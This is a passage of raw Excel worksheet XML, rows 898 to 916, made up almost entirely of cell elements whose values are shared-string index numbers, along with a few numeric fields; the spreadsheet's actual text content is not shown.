      <c r="M898" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N898" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O898" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P898" s="12" t="s">
        <v>6683</v>
      </c>
      <c r="Q898" s="12" t="s">
        <v>28292</v>
      </c>
      <c r="R898" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S898" s="12" t="s">
        <v>6803</v>
      </c>
      <c r="T898" s="12" t="s">
        <v>5413</v>
      </c>
      <c r="U898" s="12" t="s">
        <v>6804</v>
      </c>
      <c r="V898" s="12" t="s">
        <v>2864</v>
      </c>
      <c r="W898" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X898" s="12">
        <v>28</v>
      </c>
      <c r="Y898" s="12" t="s">
        <v>6805</v>
      </c>
    </row>
    <row r="899" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A899" s="12">
        <v>4751</v>
      </c>
      <c r="B899" s="12" t="s">
        <v>29779</v>
      </c>
      <c r="C899" s="12" t="s">
        <v>28391</v>
      </c>
      <c r="D899" s="12" t="s">
        <v>29831</v>
      </c>
      <c r="E899" s="12" t="s">
        <v>31474</v>
      </c>
      <c r="F899" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="G899" s="12" t="s">
        <v>6807</v>
      </c>
      <c r="H899" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I899" s="12" t="s">
        <v>35</v>
      </c>
      <c r="J899" s="12" t="s">
        <v>458</v>
      </c>
      <c r="K899" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L899" s="12" t="s">
        <v>53</v>
      </c>
      <c r="M899" s="12" t="s">
        <v>31583</v>
      </c>
      <c r="N899" s="12" t="s">
        <v>31596</v>
      </c>
      <c r="O899" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P899" s="12" t="s">
        <v>6808</v>
      </c>
      <c r="Q899" s="12" t="s">
        <v>28266</v>
      </c>
      <c r="R899" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S899" s="12" t="s">
        <v>6809</v>
      </c>
      <c r="T899" s="12" t="s">
        <v>6785</v>
      </c>
      <c r="U899" s="12" t="s">
        <v>6810</v>
      </c>
      <c r="V899" s="12" t="s">
        <v>222</v>
      </c>
      <c r="W899" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X899" s="12">
        <v>7</v>
      </c>
      <c r="Y899" s="12" t="s">
        <v>6811</v>
      </c>
    </row>
    <row r="900" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A900" s="12">
        <v>4763</v>
      </c>
      <c r="B900" s="12" t="s">
        <v>28390</v>
      </c>
      <c r="C900" s="12" t="s">
        <v>29786</v>
      </c>
      <c r="D900" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="E900" s="12" t="s">
        <v>31442</v>
      </c>
      <c r="F900" s="12" t="s">
        <v>29136</v>
      </c>
      <c r="G900" s="12" t="s">
        <v>6812</v>
      </c>
      <c r="H900" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I900" s="12" t="s">
        <v>51</v>
      </c>
      <c r="J900" s="12" t="s">
        <v>2531</v>
      </c>
      <c r="K900" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L900" s="12" t="s">
        <v>16</v>
      </c>
      <c r="M900" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N900" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O900" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P900" s="12" t="s">
        <v>6716</v>
      </c>
      <c r="Q900" s="12" t="s">
        <v>28266</v>
      </c>
      <c r="R900" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S900" s="12" t="s">
        <v>6813</v>
      </c>
      <c r="T900" s="12" t="s">
        <v>6814</v>
      </c>
      <c r="U900" s="12" t="s">
        <v>6815</v>
      </c>
      <c r="V900" s="12" t="s">
        <v>2391</v>
      </c>
      <c r="W900" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X900" s="12">
        <v>14</v>
      </c>
      <c r="Y900" s="12" t="s">
        <v>6816</v>
      </c>
    </row>
    <row r="901" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A901" s="12">
        <v>4765</v>
      </c>
      <c r="B901" s="12" t="s">
        <v>28375</v>
      </c>
      <c r="D901" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="F901" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="G901" s="12" t="s">
        <v>6817</v>
      </c>
      <c r="H901" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I901" s="12" t="s">
        <v>525</v>
      </c>
      <c r="J901" s="12" t="s">
        <v>28</v>
      </c>
      <c r="K901" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L901" s="12" t="s">
        <v>33</v>
      </c>
      <c r="M901" s="12" t="s">
        <v>31585</v>
      </c>
      <c r="N901" s="12" t="s">
        <v>31595</v>
      </c>
      <c r="O901" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P901" s="12" t="s">
        <v>6818</v>
      </c>
      <c r="Q901" s="12" t="s">
        <v>28292</v>
      </c>
      <c r="R901" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S901" s="12" t="s">
        <v>6819</v>
      </c>
      <c r="T901" s="12" t="s">
        <v>6820</v>
      </c>
      <c r="U901" s="12" t="s">
        <v>6821</v>
      </c>
      <c r="V901" s="12" t="s">
        <v>70</v>
      </c>
      <c r="W901" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X901" s="12">
        <v>3</v>
      </c>
      <c r="Y901" s="12" t="s">
        <v>6822</v>
      </c>
    </row>
    <row r="902" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A902" s="12">
        <v>4768</v>
      </c>
      <c r="B902" s="12" t="s">
        <v>28232</v>
      </c>
      <c r="D902" s="12" t="s">
        <v>29128</v>
      </c>
      <c r="E902" s="13" t="s">
        <v>31439</v>
      </c>
      <c r="F902" s="12" t="s">
        <v>29128</v>
      </c>
      <c r="G902" s="12" t="s">
        <v>6823</v>
      </c>
      <c r="H902" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I902" s="12" t="s">
        <v>43</v>
      </c>
      <c r="J902" s="12" t="s">
        <v>103</v>
      </c>
      <c r="K902" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L902" s="12" t="s">
        <v>16</v>
      </c>
      <c r="M902" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N902" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O902" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P902" s="12" t="s">
        <v>6818</v>
      </c>
      <c r="Q902" s="12" t="s">
        <v>28292</v>
      </c>
      <c r="R902" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S902" s="12" t="s">
        <v>6824</v>
      </c>
      <c r="T902" s="12" t="s">
        <v>6825</v>
      </c>
      <c r="U902" s="12" t="s">
        <v>6826</v>
      </c>
      <c r="V902" s="12" t="s">
        <v>1174</v>
      </c>
      <c r="W902" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X902" s="12">
        <v>38</v>
      </c>
      <c r="Y902" s="12" t="s">
        <v>6827</v>
      </c>
    </row>
    <row r="903" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A903" s="12">
        <v>4770</v>
      </c>
      <c r="B903" s="12" t="s">
        <v>29779</v>
      </c>
      <c r="C903" s="12" t="s">
        <v>29813</v>
      </c>
      <c r="D903" s="12" t="s">
        <v>29138</v>
      </c>
      <c r="E903" s="12" t="s">
        <v>31428</v>
      </c>
      <c r="F903" s="12" t="s">
        <v>29139</v>
      </c>
      <c r="G903" s="12" t="s">
        <v>6828</v>
      </c>
      <c r="H903" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I903" s="12" t="s">
        <v>28</v>
      </c>
      <c r="J903" s="12" t="s">
        <v>28</v>
      </c>
      <c r="K903" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L903" s="12" t="s">
        <v>53</v>
      </c>
      <c r="M903" s="12" t="s">
        <v>31583</v>
      </c>
      <c r="N903" s="12" t="s">
        <v>31596</v>
      </c>
      <c r="O903" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P903" s="12" t="s">
        <v>6829</v>
      </c>
      <c r="Q903" s="12" t="s">
        <v>28292</v>
      </c>
      <c r="R903" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S903" s="12" t="s">
        <v>6830</v>
      </c>
      <c r="T903" s="12" t="s">
        <v>5847</v>
      </c>
      <c r="U903" s="12" t="s">
        <v>6831</v>
      </c>
      <c r="V903" s="12" t="s">
        <v>6832</v>
      </c>
      <c r="W903" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X903" s="12">
        <v>16</v>
      </c>
      <c r="Y903" s="12" t="s">
        <v>6833</v>
      </c>
    </row>
    <row r="904" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A904" s="12">
        <v>4771</v>
      </c>
      <c r="B904" s="12" t="s">
        <v>28259</v>
      </c>
      <c r="C904" s="12" t="s">
        <v>31420</v>
      </c>
      <c r="D904" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="E904" s="12" t="s">
        <v>31435</v>
      </c>
      <c r="F904" s="12" t="s">
        <v>29140</v>
      </c>
      <c r="G904" s="12" t="s">
        <v>6834</v>
      </c>
      <c r="H904" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I904" s="12" t="s">
        <v>35</v>
      </c>
      <c r="J904" s="12" t="s">
        <v>368</v>
      </c>
      <c r="K904" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L904" s="12" t="s">
        <v>53</v>
      </c>
      <c r="M904" s="12" t="s">
        <v>31583</v>
      </c>
      <c r="N904" s="12" t="s">
        <v>31596</v>
      </c>
      <c r="O904" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P904" s="12" t="s">
        <v>6672</v>
      </c>
      <c r="Q904" s="12" t="s">
        <v>28266</v>
      </c>
      <c r="R904" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S904" s="12" t="s">
        <v>6835</v>
      </c>
      <c r="T904" s="12" t="s">
        <v>6836</v>
      </c>
      <c r="U904" s="12" t="s">
        <v>6837</v>
      </c>
      <c r="V904" s="12" t="s">
        <v>1881</v>
      </c>
      <c r="W904" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X904" s="12">
        <v>9</v>
      </c>
      <c r="Y904" s="12" t="s">
        <v>6838</v>
      </c>
    </row>
    <row r="905" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A905" s="12">
        <v>4781</v>
      </c>
      <c r="B905" s="12" t="s">
        <v>29137</v>
      </c>
      <c r="C905" s="12" t="s">
        <v>29141</v>
      </c>
      <c r="D905" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="E905" s="12" t="s">
        <v>31548</v>
      </c>
      <c r="F905" s="12" t="s">
        <v>29139</v>
      </c>
      <c r="G905" s="12" t="s">
        <v>6849</v>
      </c>
      <c r="H905" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I905" s="12" t="s">
        <v>1460</v>
      </c>
      <c r="J905" s="12" t="s">
        <v>3174</v>
      </c>
      <c r="K905" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L905" s="12" t="s">
        <v>16</v>
      </c>
      <c r="M905" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N905" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O905" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P905" s="12" t="s">
        <v>6818</v>
      </c>
      <c r="Q905" s="12" t="s">
        <v>28292</v>
      </c>
      <c r="R905" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S905" s="12" t="s">
        <v>6850</v>
      </c>
      <c r="T905" s="12" t="s">
        <v>6851</v>
      </c>
      <c r="U905" s="12" t="s">
        <v>6852</v>
      </c>
      <c r="V905" s="12" t="s">
        <v>4176</v>
      </c>
      <c r="W905" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X905" s="12">
        <v>19</v>
      </c>
      <c r="Y905" s="12" t="s">
        <v>6853</v>
      </c>
    </row>
    <row r="906" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A906" s="12">
        <v>4786</v>
      </c>
      <c r="B906" s="12" t="s">
        <v>28356</v>
      </c>
      <c r="C906" s="12" t="s">
        <v>28361</v>
      </c>
      <c r="D906" s="12" t="s">
        <v>28346</v>
      </c>
      <c r="F906" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="G906" s="12" t="s">
        <v>6855</v>
      </c>
      <c r="H906" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I906" s="12" t="s">
        <v>28</v>
      </c>
      <c r="J906" s="12" t="s">
        <v>28</v>
      </c>
      <c r="K906" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L906" s="12" t="s">
        <v>16</v>
      </c>
      <c r="M906" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N906" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O906" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P906" s="12" t="s">
        <v>6856</v>
      </c>
      <c r="Q906" s="12" t="s">
        <v>28292</v>
      </c>
      <c r="R906" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S906" s="12" t="s">
        <v>6857</v>
      </c>
      <c r="T906" s="12" t="s">
        <v>1149</v>
      </c>
      <c r="U906" s="12" t="s">
        <v>6858</v>
      </c>
      <c r="V906" s="12" t="s">
        <v>3527</v>
      </c>
      <c r="W906" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X906" s="12">
        <v>4</v>
      </c>
      <c r="Y906" s="12" t="s">
        <v>6859</v>
      </c>
    </row>
    <row r="907" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A907" s="12">
        <v>4792</v>
      </c>
      <c r="B907" s="12" t="s">
        <v>29142</v>
      </c>
      <c r="C907" s="12" t="s">
        <v>29143</v>
      </c>
      <c r="D907" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="E907" s="12" t="s">
        <v>31451</v>
      </c>
      <c r="F907" s="12" t="s">
        <v>29139</v>
      </c>
      <c r="G907" s="12" t="s">
        <v>6860</v>
      </c>
      <c r="H907" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I907" s="12" t="s">
        <v>22</v>
      </c>
      <c r="J907" s="12" t="s">
        <v>1724</v>
      </c>
      <c r="K907" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L907" s="12" t="s">
        <v>16</v>
      </c>
      <c r="M907" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N907" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O907" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P907" s="12" t="s">
        <v>6818</v>
      </c>
      <c r="Q907" s="12" t="s">
        <v>28292</v>
      </c>
      <c r="R907" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S907" s="12" t="s">
        <v>6861</v>
      </c>
      <c r="T907" s="12" t="s">
        <v>4769</v>
      </c>
      <c r="U907" s="12" t="s">
        <v>6862</v>
      </c>
      <c r="V907" s="12" t="s">
        <v>921</v>
      </c>
      <c r="W907" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X907" s="12">
        <v>10</v>
      </c>
      <c r="Y907" s="12" t="s">
        <v>6863</v>
      </c>
    </row>
    <row r="908" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A908" s="12">
        <v>4796</v>
      </c>
      <c r="B908" s="12" t="s">
        <v>29144</v>
      </c>
      <c r="C908" s="12" t="s">
        <v>28406</v>
      </c>
      <c r="D908" s="12" t="s">
        <v>29145</v>
      </c>
      <c r="E908" s="12" t="s">
        <v>31436</v>
      </c>
      <c r="F908" s="12" t="s">
        <v>29146</v>
      </c>
      <c r="G908" s="12" t="s">
        <v>6864</v>
      </c>
      <c r="H908" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I908" s="12" t="s">
        <v>28</v>
      </c>
      <c r="J908" s="12" t="s">
        <v>28</v>
      </c>
      <c r="K908" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L908" s="12" t="s">
        <v>53</v>
      </c>
      <c r="M908" s="12" t="s">
        <v>31583</v>
      </c>
      <c r="N908" s="12" t="s">
        <v>31596</v>
      </c>
      <c r="O908" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P908" s="12" t="s">
        <v>6829</v>
      </c>
      <c r="Q908" s="12" t="s">
        <v>28292</v>
      </c>
      <c r="R908" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S908" s="12" t="s">
        <v>6865</v>
      </c>
      <c r="T908" s="12" t="s">
        <v>6866</v>
      </c>
      <c r="U908" s="12" t="s">
        <v>6867</v>
      </c>
      <c r="V908" s="12" t="s">
        <v>930</v>
      </c>
      <c r="W908" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X908" s="12">
        <v>20</v>
      </c>
      <c r="Y908" s="12" t="s">
        <v>6868</v>
      </c>
    </row>
    <row r="909" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A909" s="12">
        <v>4800</v>
      </c>
      <c r="B909" s="12" t="s">
        <v>29782</v>
      </c>
      <c r="C909" s="12" t="s">
        <v>28466</v>
      </c>
      <c r="D909" s="12" t="s">
        <v>29148</v>
      </c>
      <c r="F909" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="G909" s="12" t="s">
        <v>6874</v>
      </c>
      <c r="H909" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I909" s="12" t="s">
        <v>1460</v>
      </c>
      <c r="J909" s="12" t="s">
        <v>28</v>
      </c>
      <c r="K909" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L909" s="12" t="s">
        <v>53</v>
      </c>
      <c r="M909" s="12" t="s">
        <v>31583</v>
      </c>
      <c r="N909" s="12" t="s">
        <v>31596</v>
      </c>
      <c r="O909" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P909" s="12" t="s">
        <v>6854</v>
      </c>
      <c r="Q909" s="12" t="s">
        <v>28292</v>
      </c>
      <c r="R909" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S909" s="12" t="s">
        <v>6875</v>
      </c>
      <c r="T909" s="12" t="s">
        <v>6876</v>
      </c>
      <c r="U909" s="12" t="s">
        <v>6877</v>
      </c>
      <c r="V909" s="12" t="s">
        <v>5649</v>
      </c>
      <c r="W909" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X909" s="12">
        <v>6</v>
      </c>
      <c r="Y909" s="12" t="s">
        <v>6878</v>
      </c>
    </row>
    <row r="910" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A910" s="12">
        <v>4802</v>
      </c>
      <c r="B910" s="12" t="s">
        <v>29149</v>
      </c>
      <c r="C910" s="12" t="s">
        <v>29150</v>
      </c>
      <c r="D910" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="E910" s="13" t="s">
        <v>31439</v>
      </c>
      <c r="F910" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="G910" s="12" t="s">
        <v>6883</v>
      </c>
      <c r="H910" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I910" s="12" t="s">
        <v>43</v>
      </c>
      <c r="J910" s="12" t="s">
        <v>194</v>
      </c>
      <c r="K910" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L910" s="12" t="s">
        <v>16</v>
      </c>
      <c r="M910" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N910" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O910" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P910" s="12" t="s">
        <v>6884</v>
      </c>
      <c r="Q910" s="12" t="s">
        <v>28292</v>
      </c>
      <c r="R910" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S910" s="12" t="s">
        <v>6885</v>
      </c>
      <c r="T910" s="12" t="s">
        <v>4769</v>
      </c>
      <c r="U910" s="12" t="s">
        <v>6886</v>
      </c>
      <c r="V910" s="12" t="s">
        <v>197</v>
      </c>
      <c r="W910" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X910" s="12">
        <v>5</v>
      </c>
      <c r="Y910" s="12" t="s">
        <v>6887</v>
      </c>
    </row>
    <row r="911" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A911" s="12">
        <v>4806</v>
      </c>
      <c r="B911" s="12" t="s">
        <v>28390</v>
      </c>
      <c r="C911" s="12" t="s">
        <v>29151</v>
      </c>
      <c r="D911" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="F911" s="12" t="s">
        <v>29152</v>
      </c>
      <c r="G911" s="12" t="s">
        <v>6888</v>
      </c>
      <c r="H911" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I911" s="12" t="s">
        <v>22</v>
      </c>
      <c r="J911" s="12" t="s">
        <v>4248</v>
      </c>
      <c r="K911" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L911" s="12" t="s">
        <v>16</v>
      </c>
      <c r="M911" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N911" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O911" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P911" s="12" t="s">
        <v>6818</v>
      </c>
      <c r="Q911" s="12" t="s">
        <v>28292</v>
      </c>
      <c r="R911" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S911" s="12" t="s">
        <v>6889</v>
      </c>
      <c r="T911" s="12" t="s">
        <v>6890</v>
      </c>
      <c r="U911" s="12" t="s">
        <v>6891</v>
      </c>
      <c r="V911" s="12" t="s">
        <v>5099</v>
      </c>
      <c r="W911" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X911" s="12">
        <v>16</v>
      </c>
      <c r="Y911" s="12" t="s">
        <v>6892</v>
      </c>
    </row>
    <row r="912" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A912" s="12">
        <v>4810</v>
      </c>
      <c r="B912" s="12" t="s">
        <v>29153</v>
      </c>
      <c r="D912" s="12" t="s">
        <v>29154</v>
      </c>
      <c r="F912" s="12" t="s">
        <v>29138</v>
      </c>
      <c r="G912" s="12" t="s">
        <v>6893</v>
      </c>
      <c r="H912" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I912" s="12" t="s">
        <v>111</v>
      </c>
      <c r="J912" s="12" t="s">
        <v>28</v>
      </c>
      <c r="K912" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L912" s="12" t="s">
        <v>16</v>
      </c>
      <c r="M912" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N912" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O912" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P912" s="12" t="s">
        <v>6894</v>
      </c>
      <c r="Q912" s="12" t="s">
        <v>28292</v>
      </c>
      <c r="R912" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S912" s="12" t="s">
        <v>6895</v>
      </c>
      <c r="T912" s="12" t="s">
        <v>6896</v>
      </c>
      <c r="U912" s="12" t="s">
        <v>6897</v>
      </c>
      <c r="V912" s="12" t="s">
        <v>323</v>
      </c>
      <c r="W912" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X912" s="12">
        <v>1</v>
      </c>
      <c r="Y912" s="12" t="s">
        <v>6898</v>
      </c>
    </row>
    <row r="913" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A913" s="12">
        <v>4812</v>
      </c>
      <c r="B913" s="12" t="s">
        <v>28356</v>
      </c>
      <c r="C913" s="12" t="s">
        <v>28361</v>
      </c>
      <c r="D913" s="12" t="s">
        <v>28346</v>
      </c>
      <c r="F913" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="G913" s="12" t="s">
        <v>6899</v>
      </c>
      <c r="H913" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I913" s="12" t="s">
        <v>43</v>
      </c>
      <c r="J913" s="12" t="s">
        <v>103</v>
      </c>
      <c r="K913" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L913" s="12" t="s">
        <v>16</v>
      </c>
      <c r="M913" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N913" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O913" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P913" s="12" t="s">
        <v>4122</v>
      </c>
      <c r="Q913" s="12">
        <v>2.6</v>
      </c>
      <c r="R913" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S913" s="12" t="s">
        <v>6900</v>
      </c>
      <c r="T913" s="12" t="s">
        <v>6901</v>
      </c>
      <c r="U913" s="12" t="s">
        <v>6902</v>
      </c>
      <c r="V913" s="12" t="s">
        <v>1174</v>
      </c>
      <c r="W913" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X913" s="12">
        <v>6</v>
      </c>
      <c r="Y913" s="12" t="s">
        <v>6903</v>
      </c>
    </row>
    <row r="914" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A914" s="12">
        <v>4824</v>
      </c>
      <c r="B914" s="12" t="s">
        <v>28232</v>
      </c>
      <c r="D914" s="12" t="s">
        <v>29155</v>
      </c>
      <c r="F914" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="G914" s="12" t="s">
        <v>6907</v>
      </c>
      <c r="H914" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I914" s="12" t="s">
        <v>51</v>
      </c>
      <c r="J914" s="12" t="s">
        <v>52</v>
      </c>
      <c r="K914" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L914" s="12" t="s">
        <v>33</v>
      </c>
      <c r="M914" s="12" t="s">
        <v>31585</v>
      </c>
      <c r="N914" s="12" t="s">
        <v>31595</v>
      </c>
      <c r="O914" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P914" s="12" t="s">
        <v>6908</v>
      </c>
      <c r="Q914" s="12" t="s">
        <v>28292</v>
      </c>
      <c r="R914" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S914" s="12" t="s">
        <v>6909</v>
      </c>
      <c r="T914" s="12" t="s">
        <v>6910</v>
      </c>
      <c r="U914" s="12" t="s">
        <v>6911</v>
      </c>
      <c r="V914" s="12" t="s">
        <v>57</v>
      </c>
      <c r="W914" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X914" s="12">
        <v>15</v>
      </c>
      <c r="Y914" s="12" t="s">
        <v>6912</v>
      </c>
    </row>
    <row r="915" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A915" s="12">
        <v>4829</v>
      </c>
      <c r="B915" s="12" t="s">
        <v>28353</v>
      </c>
      <c r="D915" s="12" t="s">
        <v>28348</v>
      </c>
      <c r="E915" s="12" t="s">
        <v>31442</v>
      </c>
      <c r="F915" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="G915" s="12" t="s">
        <v>6919</v>
      </c>
      <c r="H915" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I915" s="12" t="s">
        <v>525</v>
      </c>
      <c r="J915" s="12" t="s">
        <v>4121</v>
      </c>
      <c r="K915" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L915" s="12" t="s">
        <v>16</v>
      </c>
      <c r="M915" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N915" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O915" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P915" s="12" t="s">
        <v>6854</v>
      </c>
      <c r="Q915" s="12" t="s">
        <v>28292</v>
      </c>
      <c r="R915" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S915" s="12" t="s">
        <v>6920</v>
      </c>
      <c r="T915" s="12" t="s">
        <v>6444</v>
      </c>
      <c r="U915" s="12" t="s">
        <v>6921</v>
      </c>
      <c r="V915" s="12" t="s">
        <v>39</v>
      </c>
      <c r="W915" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X915" s="12">
        <v>11</v>
      </c>
      <c r="Y915" s="12" t="s">
        <v>6922</v>
      </c>
    </row>
    <row r="916" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A916" s="12">
        <v>4833</v>
      </c>
      <c r="B916" s="12" t="s">
        <v>29156</v>
      </c>
      <c r="D916" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="E916" s="12" t="s">
        <v>31442</v>
      </c>
      <c r="F916" s="12" t="s">
        <v>29138</v>
      </c>
      <c r="G916" s="12" t="s">
        <v>6923</v>
      </c>
      <c r="H916" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I916" s="12" t="s">
        <v>145</v>
      </c>
      <c r="J916" s="12" t="s">
        <v>941</v>
      </c>
      <c r="K916" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L916" s="12" t="s">
        <v>16</v>
      </c>
      <c r="M916" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N916" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O916" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P916" s="12" t="s">
        <v>6924</v>
      </c>
      <c r="Q916" s="12" t="s">
        <v>28294</v>
      </c>
      <c r="R916" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S916" s="12" t="s">
        <v>6925</v>
      </c>
      <c r="T916" s="12" t="s">
        <v>6208</v>
      </c>
      <c r="U916" s="12" t="s">
        <v>6926</v>
      </c>
      <c r="V916" s="12" t="s">
        <v>222</v>
      </c>
      <c r="W916" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X916" s="12">
        <v>4</v>
      </c>
      <c r="Y916" s="12" t="s">
        <v>6927</v>
      </c>
    </row>
